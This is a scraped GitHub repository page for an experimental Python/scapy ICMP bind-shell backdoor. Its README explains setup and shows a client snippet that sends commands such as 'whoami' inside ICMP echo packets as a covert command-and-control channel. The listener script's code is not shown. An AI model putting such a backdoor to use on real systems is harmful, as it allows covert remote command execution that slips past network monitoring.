Skip to content
Experimental python3.x based ICMP bind shell listener using scapy and windows 'compatible'
Python
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore
LICENSE
README.md
icmp-shellcode-experimental.png
icmp_backdoor_scapy.py

README.md

icmp-bindshell

Experimental python3.x based ICMP bind shell listener using scapy and windows 'compatible'

README/USAGE:

This is a simple PoC for sending basic C2 over ICMP echo/replies via 'bind' equivalent The listener has been tested on Python 3.x under Windows within 64 bit python default settings Ensure that you do a 'pip install scapy' prior to using the script Modify the sniff listener 'iface=' to be whichever interface you use

In windows, you can find this under show_interfaces() illustrated below:

show_interfaces() INDEX IFACE IP MAC 13 Intel(R) Dual Band Wireless-AC 8265 172.20.20.20 IntelCor:11:22:00

Client Usage Example:

Run scapy interactive (aka start > run > cmd.exe > scapy) command = "whoami" sendpkt = IP(src="10.10.10.10", dst="20.20.20.20")/ICMP(type=8)/Raw(load=command) ans, unans = sr(sendpkt, timeout=2) ans[0]

NOTE: Any expected return payload seems to not work well with multi-line returns.

Example findings with this base code: whoami - returns in icmp response pkt hostname - returns in icmp response pkt ipconfig - Returns only a new line in response pkt and '\n' errors in the listening console screen ping foo.com - Returns empty in response pkt with payload on the listening console screen

This software provides no expressed warranty or liability for use and is licensed under GPLv2 Dennis Chow dchow[AT]xtecsystems.com www.scissecurity.com

example

You can’t perform that action at this time.